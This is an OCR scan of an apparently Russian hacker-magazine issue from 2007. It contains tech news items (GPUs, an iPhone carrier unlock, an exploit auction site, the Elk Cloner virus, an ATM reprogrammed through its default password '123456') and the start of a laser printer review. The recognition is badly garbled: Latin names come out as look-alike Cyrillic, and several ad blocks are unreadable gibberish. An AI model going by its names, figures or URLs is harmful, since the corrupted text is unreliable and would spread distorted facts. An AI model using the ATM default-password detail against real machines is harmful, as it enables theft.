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Большой выбор компьютеров, ноутбуков, фото- к вице пенники, телевизоров, трЭ, иойнльнык телефонов. 







□ очу поделиться чудной новостью — у нас в команде пополнение. Нето что бы кто-то родился, 
скорее наоборот. Дело былотак. 

Ездили мы со Степом на слетсисадминов под Калугой. Все, какобычно: поляна с палат- 
ками, канистры с водками, мужики с проводами. На общем фоне выделялись только два 
чувака, которых мы сразу заприметили. Один — в очках — бегал пополянес флагом Марокко и пел патри- 
отические песни о любви к галлюциногенным кактусам. Другой чувакпо имени Вася оказался ІТ-спецом 
покруче Андрюшка и, узнав, что мы изХ, стал возбужденно гнать об особенностях новых версий СІБСО 
105 и о том, почему 0 реп ВЗй никогда не завоюет мир. Мгновенно было принято решение погрузить этих 
пьяных парней в машину, чтобы обстоятельнее выслушать их уже в редакции. 



пікііог, главный редактор 




Липломиоованный специалист по сетевой безопасности, 
держатель международных сертификатов ССІЕ, СС5Р, СОМА, МС50, МС5А 
и МС5Е. Прошел обучение в учебных центрах СІ5С0, МісгозоЛ, ІВМ и СотрТІА, 
сдав все тесты на «отлично». Искренне любит Ооодіе, использует ОеЬіап І_іпих 
и пьет морковный сок вместо пива. В общении скромен, но многозначителен. 
Люб ит умные слова и ненавидит поспешные выводы. 



ЩД В прошлом - подававший надежды студент. Был отчислен с третьего курса 
математического факультета за распитие спиртного и матерную ругань в адрес 
декана. Косил отармии по психическому здоровью, увлекся взломом бан- 
ковских систем, чтобы откупиться от военкомата. Мечтаето больших и легких 
деньгах, популярен у женщин. Имеет опыт общения с МВД по факту воровства 
трафика в локальных сетях. 



СО СЛЕДУЮЩЕГО НОМЕРА ПАРНИ ПЛОТНО ПРИСТУПАЮТ К РАБОТЕ В НС. 
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'Обо всем за последний меся 



В начале своего существования Соо§1е индексировала 25 ТЫСЯЧ веб-страниц 
— сейчас их миллиарды. При каждом новом индексировании Сеть 

увеличивается на 10—25% 




Установка: охлапить 
и выжать максимум 

Золотое правило оверклокера: если сильнее охладить, то можно сильнее 
разогнать. Сами производители днем и ночью трудятся над тем, чтобы 
снизить тепловыделение и установить еще более быстродействующие 
чипы. А если речь идет о пылких графических процессорах нового поко- 
ления АТІ ГО2600ХТ/Ш2600РКО/Ш2400ХТ и НО2400РКО от АІѵГО, то 
этот вопрос становится особенно остро. К счастью, новым видеокартам 
А51І5 ЕАН2600 и ЕАН2400, которые как раз и построены на этих чипах, 
есть чем похвастаться. Благодаря улучшенной системе охлаждения про- 
изводителям удалось увеличить площадь рассеивания тепла на 25%, а это 
сразу снижает температуру ОРИ на 10-20°С. Мало того, эти видеокарты 
официально поддерживают ЭігесіХ 10, а также уникальную технологию 
Зріепсіісі Ѵісіео ІШе11і§епс, которая автоматически обеспечивает опти- 
мальное качество изображения. Другими словами, видео на экране ком- 
пьютера будет выглядеть так же хорошо, как на экране лучших телевизо- 
ров. В комплект поставки входит также эксклюзивный софт АЗИЗ Сатег 
ОЗЭ, с помощью которой можно увеличить производительность системы 
в режиме реального времени, то есть без необходимости выходить из 
игрушки. А дополнительные опции этой проги позволяют записывать 
эпизоды игры или вообще сразу транслировать изображение в Сеть. 



Средняя продолжительность жизни фишинговой веб-страницы составляет четверо суток, а 
каждая из жертв теряет в среднем 1250 долларов США. 



Настоящий экстаз геймера 

(^иаке 3. ЗіагсгаИ. ѴѴагсгаЙ: III. Сейчас уже и не сосчитать, сколько 
времени я потратил на тренировки и оттачивание скила, но, судя по 
количеству грамот со всевозможных турниров, явно не мало. О том, 
насколько важны для геймера его девайсы и чем грозит их отсутствие, 
я знаю не понаслышке. Самое главное — это, конечно же, мышь. Если 
обычному юзеру, вообще говоря, по барабану разрешение его грызу- 
на, то для опытного игрока это чуть ли не самый основной параметр. 

И в этом смысле с новой мышкой ЛІБ Еі^ІПег Базег Моизе все в порядке. 
Поддерживаемое разрешение 2200-1600-800 брі дает беспрецедент- 
ное преимущество в игре! Другая уникальная функция — управление 
скорострельностью. Ты можешь сам настроить, сколько выстрелов 
делать за один клик: 1, 2, 3 или 4, и тем самым серьезно улучшить свои 
показатели в той же Контре. Меняющийся цвет подсветки колеса 
показывает установленную скорость стрельбы, а цветной индикатор 
на корпусе — выбранное разрешение. Благодаря лазерной техно- 
логии мы имеем не только ошеломляющее разрешение, но еще и 
возможность работы на любой поверхности (не в пример оптическим 
мышкам) . И еще. Ты можешь сам выбрать раскраску мышки: мышь 
ЛІБ Еі^ІЛег Базег представлена в титановом, ярко-красном, золотом и 
офигенном «защитном» варианте. 
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іРНопе просто так не разломить 

Еще до выхода іРЬопе было заявлено, что продаваться он будет вместе с двухгодовым 
контрактом от компании АТ&Т. Хакеры посмеялись, махнули на этой рукой и, вытирая те- 
кущие слюни, начали трубить по всей Сети, что взлом этого ограничения едва ли займет 
больше двух недель. И вот іРЬопе вышел. Тут же появились два активатора, позволяющие 
использовать в нем ѴѴі-Рі и плеер с другими функциями телефона, и масса разнообразных 
статей, рассказывающих, что еще можно сотворить с новомодной игрушкой. Вот только 
привязка к АТ&Т как была, таки осталась. В Сети даже появились слухи, что обойти ее 
невозможно. Паренек СеоНоі, один из участников взлома, выяснил, что привязка к АТ&Т 
находится в микропрограммном обеспечении С5М-чипсета. Причем защита проверяет 
не только уникальный для каждого оператора регистрационный номер 5ІМ-карты, 
но и код страны. Мало того, программное обеспечение, отвечающее за защиту, имеет 
собственную уникальную цифровую подпись, что препятствует подделке. Последним 
рубежом защиты коммуникатора является индивидуальный для каждого телефона ключ, 
отсылаемый оператору при активации. Впрочем, даже такие ухищрения со стороны 
Арріе не остановили хакеров. Британская компания еХрапзуз ІЖуже предлагает «отвя- 
занный іРЬопе», совместимый со всеми европейскими операторами, но пока только по 
предзаказу. Точная дата выхода игрушки еще неизвестна. В свою очередь американская 
компания Віепскес, занимающаяся производством блендеров, наглядно продемонстри- 
ровала, как именно нужно ломать іРЬопе. Не без помощи своей продукции :). Душеразди- 
рающее зрелище доступно в онлайн (ѵ\ллл/у.ѵуі11ііЫепб.сот) и на нашем диске. 

90% из первых купивших невероятно 
повопьны своим телефоном. 

85% бупут советовать его купить другим. 

51% перешли от другого оператора. 

35% заплатили неустойку другому 
оператору из-за перехода. 

3 из ІО — это новые клиенты Арріе. 



Первый сервис-пак для ѴѴіпсіошз Ѵізіа 



появится только в 



2008 



году. 



какой большой! 

Лучший способ представить свои мысли на каком-либо 
мероприятии — показать их на информационном 
табло. С этой задачей на ура справится новинка от 
компании $ат5іт§ — ЗупсМазіег 57СЮХ. Несмот- 
ря на большую диагональ (57 дюймов!), монитор 
отличается строгим, элегантным дизайном. Для того 
чтобы эффектно воспроизводить ролики в высоком 
разрешении, модель поддерживает видеорежим 
Риіі НН (1920x1080) . Идеальное качество картинки 
достигается также за счет широких углов обзора (178 
градусов по вертикали и горизонтали) и прекрасных 
коэффициентов контрастности. А благодаря мини- 
мальному времени отклика (всего 8 мс) обеспечива- 
ется и хорошая передача динамичных сцен. Целый 
ряд видеотерминалов — аналоговый, цифровой, 
композитный и компонентный — дает возможность 
подключать самые разнообразные внешние источники 
сигнала, от компьютера до проигрывателей дисков 
Віи-гау. 
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лІНі 1Л^>'1ПКЯ>ЯШМН7 РЯЧ 

Л 71 Сгос-ьРігс н ■& Рсотаспп МиІІІ -ЁгзрЫсз- □иррог 

104 % ЭОЫР СвриѵНиг ^ыьіуі -ѵШі Ру. ■■арии Зич-ЫіііыЫй* Егіе]іішѵг іпц 

Іі^І 4 Мггг >: Кіпглдг: ТЪгГлпкэду лп :1 Кгрііі КгрггтѵгтТгсппгусіду 

і^маЫі. ЬЛИ 7.1 СІигмт“І Н С 1 Аиіік: 

Й- ЯА7ДІ , йБАТДІІ Р* ІРРР1ЯЩ 1Р- МЯБР П 



Матариі-скиа ггшгты Рохсопп серин Согв 3 
обеспечивают высочайшую надежность, прос- 
тату использования и поддержку мно- 
жества интерфейсов Использование исклю- 
чительно твердотельных конденсаторов 
ешё больше повышает надёжность систем С 
Р35^ 5 безо~каэная работа даже тон полной 
загрузи* системы. Забудь про СігІ+АІІжОеІ! 



НАДЁЖНОСТЬ+ДОЛГОВЕЧНОСТЬ = 



РОХСОПП 



■л/ѵѵи.іомсопп.ги 

■ліѵѵи.согеЙтоНіагЬоагсІ.сот ^ 

// 



.X 



у? 



Мос іі. 2 вг. РгаІСот - (495)730 -БёО 8; ЗіагМазІѳ-- - (4581783-4242; Шіш Еібсігопім - !'49Б;і790-78Э5 АоЗвкгг ксмпькггарэ - 
(455)7?5-Ѳ00Ѳ; АРКИС - (4Р5)ЗѲ0-54С7 ЕѳріЬ'Й регѳр |ИФР0ИОИ - (40^|7ЭС-Э0ЭО; Иипййн - (405)341 -&І$1 ; КИЕРР7РОНИКА 
(4-ПЙ1ЙП4 ?йД1 ; ІП*т Кпмр-туникйОі ін Г4 РБ;іПРіР ^ЯБІ НШШРГ гать юмпыгугаян&і* нягяялнлр, С]ртекяе 

ЛяСійраТСр.-'П - .;496)5О>0395; ФоруГіѴІ^антр - (ад5}775-775-9: АГЬИетЬбЕСК: КОѴіПЬ^ПЕрНэЮ МІТГі - (5553)256-934: ЬЕЗНЕуп: К- 
ТрвИи: - (3332)66-6910: Вс-рс-нѳн: Рут - (4732)77-9339: Ег^тэринйур - : Зрасв - (348)37* -9563; Трилайі- - (848)878-7079; Имѳкк 
: Кі^г.урудлн Центр - 1841 ^53-305; Кур^: ОЬТТ ИСК ^ЮЭ; - (4710)510-601 ; Новосибирск: ИЭТА - ;Ж?)ЭЭ4-10Ю: Пермь: 
Инптар Гганзп^л^/ ІМ?;? 1 ? 434-й: Птпігпрпк Дирмкпм (а7ЯЯ)ПД 01Л1; Ргатта ня Длну Фпргтп іШЯ)?37 НРІ1П; Слмаря: 
Аксус- (54Б)270-59бС. 
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4 месяца тюрьмы за ролик 
на ѴоиТиЬе 

В Европе очень трепетно относятся к правилам дорожного движения. 
Там все ездят пристегнутыми, обязательно пропускают пешеходов 
и строго соблюдают скоростной режим. Не дай бог тебе превысить 
скорость даже на 10 км/ч — от полиции не откупишься. Впрочем, 
смельчаки находятся и там. 18-летний шумахер решил проехаться на 
отцовской ТоуоГа МП 2 со скоростью 120 миль/час по одной из улиц 
английского городка Бернли. И проехал же! А заодно записал все на 
камеру смартфона. Просто показать ролик друзьям ему показалось 
мало, поэтому он оперативно выложил его на сервис УоиТиЪе. За это 
и поплатился: смельчака быстро нашли, а запись на онлайн-сервисе 
использовали в качестве доказательства в суде. Итог — 4 месяца на 
нарах. Стоит отметить, что на УоиТиЪе полно роликов, записанных 
российскими гонщиками на нереальных скоростях, выжимаемых на 
МКАДе и Садовом кольце. 



Зоркий глаз от РНіІірз 

Есть такие вещи, полезность которых сложно оценить, не попробо- 
вав их в действии. Ну, скажем, несколько лет назад все с большим 
недоверием относились с ѴѴі-Бі, а сейчас посмотри — он повсюду. Вот 
с веб-камерами та же самая история: до тех пор пока сам не устроишь 
видеоконференцию, не пообщаешься вдоволь с подружкой или друзь- 
ями из-за океана, так и не поймешь, на фига сдались все эти видеокон- 
ференции. Впрочем, едва ли эта тема вызвала бы у меня такой восторг, 
если бы не возможности современных веб-камер. Эта уже не просто 
тупая игрушка, которая крепится на экран, выдавая картинку чуть ли 
не хуже, чем с камеры мобильного телефона. Это уже что-то. Напри- 
мер, новая модель 8РС1300 от компании РЫНрз оснащена широко- 
угольными объективами, что вкупе с технологией отслеживания лиц 
позволяет держать лицо пользователя в центре кадра. Причем в камере 
задействована технология Ріхеі Ріш 2, применяемая в плоских телеви- 



зорах РЫНрз Ріаг ТѴ, которая обеспечи- 
вает исключительную четкость видео 
и шестимегапиксельные статические 
снимки. 6 мегапикселей в веб-ка- 
мере! Фантастика. Со звуком все 
тоже не так просто. Использование 
патентованной системы концентри- 
рования звука РЫНрз позволяет двум 
встроенным в 8РС1300 направленным 
микрофонам создавать вокруг пользовате- ля 

«зону тишины», устраняя 

внешние шумы и эхо. Конечно, цена такой игрушки не копеечная и 
составляет 99,9 евро, но можно взять модели попроще (из этой же ли- 
нейки: 5РС620, 8РС1000) и также остаться довольным результатом. 




Ежедневно в мире регистрируется около 90 ТЫСЯЧ доменных имен, при этом коли- 
чество регистрируемых доменов в среднем увеличивается на 31% в год. 




10 людей, сделавших состояние в ІТ 



Ты думаешь, Билл Гейтс все еще 
самый богатый человек в мире? Уже 
нет. Ресурс МазЬаЫе.сот опубли- 
ковал список наиболее богатых 
людей, сколотивших состояние в 
сфере ИТ: 

1 . Карлос СлимХелу, владелец 
крупнейшей в Латинской 
Америке телекоммуника- 
ционной компании Атегіса 
Моѵіі, промышленной груп- 
пы Сагзо, финансовой группы 
ІИВІЖЗА, сети магазинов и 
ресторанов. Состояние — $67,8 
миллиарда. 

2. Билл Гейтс, сооснователь корпо- 
рации Місгозоіі:. Состояние — $59,2 
миллиарда. 



3. Лоуренс Эллисон, создатель и генеральный директор компании 
Огасіе. Состояние — $21,5 миллиардов. 

4 . Пол Аллен, сооснователь МісгозоЙ:. Состояние — $18 миллиардов. 

5 и 6 . Сергей Брин и Ларри Пейдж — основатели и разработчики поис- 
ковой системы Соо^іе. Состояние — $ 16,6 миллиарда у каждого. 

7. Майкл Делл, основатель Эеіі СотріЛегз. Состояние — $15,8 милли- 
арда. 

8. Стивен Баллмер, генеральный директор любимой Місгозоіі. Состо- 
яние — $15 миллиарда. 

9. Нагиб Савирис, председатель египетской телекоммуникационной 
монополии ОгазсотТеІесот. Состояние — $10 миллиардов. 

1 0. Сунил Миттал, председатель совета директоров телекомуникаци- 
онной компании ВЬаггі Теіесот. Состояние — $9,5 миллиарда. 

Итого: трое людей из этого списка работают в Місгозоіі:, а двое — в 
Соо^іе. 
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Около 



95% 



ошиоок в программном обеспечении, обна 



ШІПД 



опубликованы и, возможно, сейчас используются хакерами. 




Ничего себе ѴѴі-Рі: 15 Гб/с 
по радиоволнам 

Инженерам технологического Центра в Джорджии, похоже, удалось 
невозможное : достичь скорости в 1 5 Гбит/с по беспроводному соеди- 
нению. При этом компьютеры находились в метре друг от друга. На 
вдвое большем расстоянии была зафиксирована скорость 10 Гбит/с, а 
на расстоянии 5 метров — 5 Гбит/с. Цифры для сравнения : даже самая 
меньшая из достигнутых скоростей в 19 раз больше, чем предполагает 
стандарт 802.1 1п (270 Мбит/с), который еще только-только вводится в 
эксплуатацию, ив 94 раза выше привычного нам 802.1 1§ (54 Мбит/с). 
Правда, ученым пришлось перейти от обычных частот 2,4 ГГц и 5,8 ГГц 
на 60 ГГц, что повлекло за собой сильное ограничение дальности дейс- 
твия связи. Связь на столь огромной частоте возможна исключительно 
в условиях прямой видимости, поскольку волны не проходят даже через 
человеческую кожу. Наиболее вероятное использование технологии 
— создание персональных сетей доступа (Регзопаі Ассезз Иеіѵѵогк), где 
устройства приема-передачи находятся вблизи друг от друга в зоне пря- 
мой видимости, а также подключение периферии к компьютеру. Новый 
стандарт, скорее всего, будет назван 802.15.3С. 



Визіпезз.сош — самый дорогой домен в интернете. Он был продан компании К. Н. ЭоппеИу за 



$350000000 



Предыдущим владельцам 



он приносил 15 лямов в год. 




Учимся на своих же ошибках 

В полицию Пенсильвании обратил- 
ся владелец магазина, сообщив, что 
накануне какой-то подозритель- 
ный тип (в шортах и сланцах) долго 
возился с установленным в заведе- 
нии банкоматом. На следующий 
день он появился вновь, и подоз- 
рения усилились. Обеспокоенный 
хозяин решил проверить баланс и 
обнаружил нули на счетах. Оказалось, мерзавец 
сумел перепрограммировать банкомат так, что- 
бы тот выдавал 20-долларовые купюры вместо 
однодолларовых, и таким образом похитил 
$1 540. Ни для кого не секрет, что большая часть 
банкоматов — это самые обычные компьютеры 
с модулями для приема/считывания карт, выдачи денег и печати чеков. 
Документация на эту модель (Тгііоп9100) беспрепятственно доступна в 
Сети. Каждый, кому попадает в руки этот документ, узнает, что стандарт- 
ный пароль надоступ ко всем функциям банкомата — это «123456» (в том 
злосчастном банкомате пароль не был изменен и действовал со дня его 
установки) . А имея доступ к админке банкомата, перепрограммировать 
его не составляет труда. С тех пор за короткий срок владелец банкомата 
поменял пароль дважды и собирается сделать это еще раз. 




Ох уж этот Гарри Поттер 

Чтобы сохранить тайну последней книги о маге и волшебнике Гарри 
Поттере до самого начала продаж, издательству пришлось раскошелить- 
ся на миллионы и миллионы долларов. Но утечка все равно произошла. 
Американское издание последнего романа Джоан Роулинг о Гарри 
Поттере выложили в файлообменные сети уже за пять дней до появления 
книги в продаже. Видимо, большой поклонник книги сфотографиро- 
вал каждую страницу издания «Наггу Роііег апб ійе ОеаіЫу Наііоѵѵз» и 
опубликовал ссылки на архивы с фотографиями на популярном торрент- 
портале млллллбетопоіб.сот . Само собой, за считанные минуты архив 
закачали тысячи человек, и он начал распространятся по Сети с бешеной 
скоростью, даже несмотря на то что ссылки с разных ресурсов постоянно 
удалялись модераторами. Хотя 
версия распространителя остается 
неизвестной, в метаданных фото- 
графий осталась масса инфор- 
мации об аппарате, с помощью 
которого они были сделаны. Ком- 
пании Сапоп удалось установить, 
что использовалась камера Сапоп 
КеЪеІ 350, и если юный пират обра- 
щался в сервис по поводу ремонта 
этого уже трехлетнего гаджета, то 
шансы его найти будут велики. 
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Телефон на базе і.іпііх 

Пока весь мир шумит по поводу выхода іРЬопе и возможности его взлома, настоящие 
гики пускают слюни в ожидании смартфона Иео1973, который наконец-то стало 
возможным заказать по интернету. Это первый мобильник, построенный на плат- 
форме Ореп Моко Сѵ\п/\Аллореппюко.сопг) , то есть работающий на базе Ілпих. Думаю, 
тебе не надо объяснять, какие возможности это предоставляет. Компилируй ядро, 
пиши свои тулзы, устанавливай все, что хочешь, — система полностью открыта, за 
исключением СЗМ/СРК5-компонентов и АСРЗ. Внешним видом Иео 1973 несколько 
напоминает іРйопе. У него также отсутствует клавиатура, а всю его лицевую панель 
занимает сенсорный дисплей с диагональю 2,8 дюйма и разрешением 480x640 
пикселей. Телефон доступен для заказа в двух вариантах: обычным комплектом 
или внутри специального хакерского бокса с кучей вкусностей. В любом случае это 
отличный девайс с СР5/ВІиеіооі1і/\Уі-Рі н Ілпих’ом на борту. 





Аукцион пля хакеров 

Сложно поверить, но хакеры — тоже люди. Вот только знания у них 
довольно специфические, а поскольку есть множество людей, которым 
до такого уровня расти и расти, они злятся и всячески вредничают. 
Попробуй разместить на еВаулот «0-бау ехріоіі для ѴѴіпбошз Ѵізіа» и в 
тот же момент получишь бан, а вместе с ним бонус — замороженный 
аккаунт РауРаІ и еще что-нибудь, если особенно не повезет. Но в послед- 
нее время все идет к тому, чтобы подпольный хакерский бизнес встал на 
вполне законные рельсы. И швейцарский стартап «еВаудля хакеров» с 
японским названием ѴѴаЪі-заЪі ГіллллллѵѵзІаЬі.сопг) — начало этого пути. 
Отныне каждый хакер может выставить на торги информацию о новых 
дырах и даже готовый эксплойт. Покупатель приобретает желаемый 
товар по аукционной цене. На данный момент на торги выставлено 7 
лотов, в том числе уязвимость с переполнением буфера в Ореп ОШсе по 
начальной цене 2000 евро. 




15 ЛЕТ назад. За изобретение этоі 
системы нужно благодарить компании 
Асізіоп, которая в 1992 году впервые 
внедрила эту услугу. 



Первому вирусу исполнилось 
25 лет 

Ровно 25 лет назад умничка школьник Рич Скрента из Питсбурга, всерьез 
увлеченный компьютерами, написал небольшую программу. Но про- 
грамму не простую — это было первое приложение, которое распро- 
странялось самостоятельно, заражая код загрузочных дискет тогда еще 
популярной операционной системы Арріе II. Само собой, после загрузки 
компьютера вирус оставался висеть в оперативке и продолжал заражать 
все дискеты, вставляемые в дисковод. По большому счету ничего плохого 
Еік Сіопег (а именно так назывался вирус) не делал, лишь изредка выводя 
на экран пользователя короткое стихотворение : «ІІ \ѵі11 §еі оп аіі уоиг 
бізкз. II \ѵі11 іпШігаіе уоиг сЫрз. Уез іі’з Сіопег! Іі ѵѵііі зііск іо уои Ііке §1ие. Іі 
ѵѵіП тосіііу КАМ Іоо. Зепб іп іЬе Сіопег!» В переводе это значит: «Еік Сіопег 
— это уникальная программа. Она проникнет на все ваши диски, 
профильтрует ваши чипы. О да, это Сіопег. Она приклеится к вам, как 
клей. Программа способна изменить и КАМ. Пустите к себе Сіопег! » 
Эх, если бы все современные вирусы были такими же безобидными. 



► 012 



ХАКЕР 08 /104/ 07 








Широкоформатное 

счастье 

Одумайся! Если дома на столе у тебя кучу 
места все еще занимает старый замызганный 
СКТ-монитор, у которого давно проблемы с 
цветопередачей, а максимального разреше- 
ния не хватает даже для того, чтобы удобно 
работать в Ѵізиаі Зшбіо, это твой случай. Его 
пора менять! Давно прошли те времена, когда 
ІХЮ-монитор с большой диагональю и клевы- 
ми характеристиками стоил бешеных денег. 

В этом месяце компания Ш анонсировала 
выход жидкокристаллических (ЖК) дисплеев 
серии Ь..6\Ѵ. Заплатив $260 за 19" широкофор- 
матную модель ($350 за 20" модель и $480 за 
22"), покупатель получит отличный дисплей, 
на котором можно не только эффективно 
работать, но и просто комфортно играть 
или смотреть фильмы. Хороший угол обзора 
(170 градусов) и рекордное время отклика (2 
мс) этому всячески способствуют. Радуют и 
прочие бонусы, например разъем ЭѴІ с ЕГОСР 
для поддержки системы ѴѴіпсіоѵѵб Ѵізіа. А 
22-дюймовый монитор (Ь226ѴѴА-\ѴЕ) также 
оснащен входом АѴ. 



Оказывается, почти каждая десятая страница заражена трояном или прочей малварью. Это 



выяснили программисты 



СООСІ.Е 



в ходе специальной проверки. 




ВеЪокІ ТѴ 5010 



ВеІюкІ ТѴ Мб Ей гл 



ЕкМшкІ ТѴ 609 К 05 
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Соодіе для мобильников 

До чего же все-таки предприимчивая компания — эта Соодіе ! Не 
проходит ни месяца без того, чтобы она не порадовала нас чем-нибудь 
новеньким, и сейчас это поисковый сервис для сотовых телефонов. 
Причем не просто поисковик, корректно отображающийся на неболь- 
шом экране мобильников и смартфонов, а полезный сервис, который 
позволит пользователям находить мелодии для звонка, игры и другой 
мобильный контент. Как оказалось, компания уже давно сотрудничает 
с продавцами мобильного контента, тщательно индексируя базы их 
продукции. Однако открытие сервиса пока откладывается. Еще неясно, 
каким образом будет реализована система оплаты. Если Соодіе решит 
использовать популярную платежную систему РауРаІ или собственную 
разработку СЬескОщ, то серьезно уменьшит прибыли сотовых операто- 
ров, которые предоставляют те же услуги и снимают деньги с лицевого 
счета клиентов. 




Ог.ѴѴеЬ против спама 

То, что с малварью надо бороться комплексно, все поняли уже давно. 
Какой смысл от файрвола, если на компьютере нет антивируса и все 
черви, несмотря на грамотно настроенные правила брандмауэра, 
лезут через дырки в ІЕ и прочем софте? Вредоносные приложения в 
корреспонденции и просто спам — это вообще отдельная «песня», 
которой решилась всерьез заняться компания «Доктор Веб», выпустив 
свой новый продукт «Антиспам Эг.ѴѴеЬ для почтовых серверов Шіх». 
Новое средство корректно обрабатывает объекты любой вложеннос- 
ти и применяет правила фильтрации в зависимости от типа найден- 
ного объекта. Серверное решение для фильтрации спама строится на 
использовании новой технологии Ог.ѴѴеЬ МаіШ, которая позволяет 
создавать систему обработки почтовых потоков из целого ряда само- 
стоятельных модулей — плагинов. Каждый реализует в себе уникаль- 
ный механизм фильтрации писем, а все вместе позволяют отсеивать 
большую часть рекламной корреспонденции. Решение заточено под 
использование на никсовых серверах. 



Авиаписпетчерская пома 

Разнообразие стартапов в Сети не перестает удивлять. Прогноз погоды, 
котировки ценных бумаг, даже спутниковые фотографии Земли, кото- 
рые еще недавно казались чем-то нереальным, выглядят теперь детским 
лепетом по сравнению с тем, что предлагает онлайн-служба ѵуѵуѵу. 
йюѵѵеЪ.сот . Ее основная задача — это предоставление всевозможной 
информации по авиационной тематике, но это не самое интересное. 
Фишка в том, что сервис позволяет почувствовать себя самым настоя- 
щим авиадиспетчером. Для этого придется скачать (или взять с наших 
дисков) Соодіе ЕапЬ и открыть в нем КМЬ-файл, предварительно скачан- 
ный со страницы ІЪоѵѵеЪ.сот. где выбирается интересующий аэропорт 
или авиакомпания. Спутниковые фотографии мира в ЗО-виде станут 
своеобразном радаром, на котором практически в реальном времени 
(с небольшой задержкой) будут отображаться траектории полетов 
самолета. Прямо как в фильмах — почти то же самое. Причем если в окне 

программы кликнуть по изобра- 
жению самолета, то высветится 
окошко с информацией о рейсе, 
маршруте следования, скорости 
воздушного судна и высоте 
полета. Огорчает лишь то, что 
в бесплатной версии список 
доступных для просмотра авиа- 
компаний и аэропортов сильно 
урезан, но даже его будет до- 
статочно, чтобы повеселиться 
самому и удивить друзей. 




Назло властям 

В Таиланде, через день после 
принятия нового закона о борьбе 
в сфере компьютерных преступ- 
лений, неизвестные взломали сайт 
Министерства информации и связи. 

Хакеры задефейсили главную страницу 
и разместили изображения свергнутого 
премьера и лидера военного переворота 

генерала Сонтхи Бунъяраткалина — нынешнего главы правящего совета 
страны, а также критику в их адрес. Согласно принятому закону, компью- 
терные преступления могут расцениваться как угроза национальной 
безопасности, а полиция имеет право изымать компьютеры в частных 
домах и офисах, если есть основания полагать, что они используются 
для клеветы, взлома и распространения порнографических материалов. 
Правоохранительные органы утверждают, что им уже известны имена 
злоумышленников, но от подробных комментариев отказываются. Если 
хакеры будут найдены, им грозит до пяти лет лишения свободы и штраф в 
3 тысячи долларов. Неприятная ситуация. 
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ВъіССКОЯ е.НЛОіІТН РпавГГрЮ ОаГ 3 6ДГй .и оочаіден ОІЛѴІ.ІІ^ І^-.'.ЧН^ЯНИ 
^Гзрігпгуі^^л лои^лхгдгти міфдр.т^|Ѵ№г х іУ^^г'^ниіт р:.тт!Г1ге.чт1гт7 
іНѴлТі^ОіймИЯ. 

Средняя ц&нв: 4500 р. М 100 Гб 



-ПѴВ-кйртЯ ЗкувІа^З (ТТ-Ригідёі 3-1401) 

Л'сГп: I ЦГ^ЧИТ ЙЛЛ/КУХІ ИМСГЙ .Ч'ёі і^іЧ[", и . , г|‘|і ік^ч ги |ЧѴ:[.1 ѵі^.'ГГГі? Лг.ѵ-Г га 1 Ді-!' ѴіИі ГіКМТгКТаТС. 

о сотне сл^-тинч-ОЕііл нанвлов нв р&знъ'х язык зх мире и ооЕеоідач^ч рззноЯ 

Н,\|, ірі 1 1^ , Гі7И , іЧіІ1І:, , ^7 Я .І,ЧГ>::.І,Ѵ І.:.і|> и і^г.' , .'Сі”0 .ігГС ,Ѵ-.І І.+Г^иііь? И ОТ\У Д-! л:?іі: 1:іі: і_М-* ■' ^ . ТО&Р іЫТДЛі 

^:'ТОд:н=і? 7 і:р гпмтиихпр.чя е пнт*ци =7 | , ' 1 [Ѵ>' 1 7 .і. Дні'Гн^ій ночид-.тдп | , '.; : 1[;Ѵ'| п I ІН ГГ.'Я-іѵартті С 

тюслвд ней воа^Фэяыоэ всего, но мьггбОѳ ндо-тачте^нй ре, | г-пиэ 1 чд | . , йт , .-г ^ОЕ^енчь.^ 

.тутг^ м і7.чг :-рч л ► г. агіѵгітл г?^- ^у^лр.г.11 СлДЗг ЦИЯЯ 2 (Х)\) р. 



оѵц^с.п.і>сі огриміос р^оуишо. ■соіУѵі.с; роііпы 
ѵсг^-т сделать тзсю міэнь /дойне& мог>- почтсчьтёйѳ гучна 

□і_:ш;л ь >::і^:ч-' раёичі-'й- :'і;:а,цичи. |^шліик;л ьм;і ли ^ік;ль. 

ддвэнг™ от О/Ѵ п&Гѵіко. что п^р^тт, 

дейстЕкпель-с ^а ! -ѳстве-ноѳ и ф ! ? , і-кии:4-альнйэ ухлэсйссзо, - 

ппркмпгь 1 мпгіп пиі -ия п і :■ ч г : г ип::ла6.-і7і :ѵі^і'і;і. Сту :і* і.т,г у ,і 
гнгі? цеш-'л 'Л'іпдя Ьу ѴѴшЮгі с вер пддчодогі ^качес^ан-ье 
веии по йграЕйдмиаол и^не=:. НеппЕвда^г 1 




МИНЗЦРАВСОЦРАЗВИТИЯ ЮССИИ ПРЕДУПРЕЖДАЕТ: 

КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ 



Но прлйііу рвхпкмм 






^ ■Геггит 






СЕРГЕЙ НИКИТИН 

Лазерное 

шоу 

Список тестируемого 
оборудования 

Сапоп ЬазегЗИо! ЬВ Р 5000 
Ерзоп АсиЕазег 2600 N 
НР Соіог Еаве^еі 1 600 
НР Соіог І_азег0е1: 2605сІ1;п 
Затзипд С ЬХ-2 1 60 N 
Хегох РЬазегб1 10 



Тестирование цветных лазерных принтеров 



Нам всем повезло, что мы родились и живем в такое время, когда развитие техники идет очень 
быстрыми темпами, когда новинки появляются так быстро и в таком количестве, что устройс- 
тва предыдущего поколения сразу дешевеют, причем если не гнаться за модой, то они вполне 
могут удовлетворить имеющиеся потребности. Скоро микросхемы будут раздавать у метро, как 
бесплатные газеты. Это касается и технологий. Если во времена, ознаменованные стрекотани- 
ем матричного принтера, струйный девайс был пределом мечтаний, то сегодня на твоем рабо- 
чем столе может оказаться как он, так и лазерный принтер. Причем не черно-белый, а цветной! 
Преимущества лазерников давно известны — это высокая скорость работы, качество печати, 
большой ресурс картриджа. Возможность печатать на нем в цвете — это тоже плюс. Сегодня мы 
протестировали такие устройства. Они тяжелы и громоздки, но многие уже явно предназначе- 
ны для использования дома. Об этом говорит как их дизайн, так и такие фишки, как встроен- 
ный кардридер и порт для прямой печати с ІІЗВ-носителей. В общем, выбор за тобой, а наш тест 
наверняка поможет тебе сориентироваться. 



Методика тестирования 

Естественно, основная часть испытаний касалась печати, ее качества и 
скорости. После подключения принтера и установки драйверов распе- 
чатывалась стандартная тестовая страница. В процессе тестирования 
мы также использовали нашу собственную страницу, состоящую из 
текста различного размера, толщины и наклонов. Крометого, на ней 
присутствовали картинка и график. В общем, комбинированный доку- 
мент. Но, помняо скорости работы лазерников, мы засекали время, за- 
траченное на печать не одной, а пяти страниц. Одну страничку они все 
печатают настолько быстро, что фиксировать эти доли секунды смысла 
не имеет. Время измерялось с момента нажатия кнопки «Печать» до 
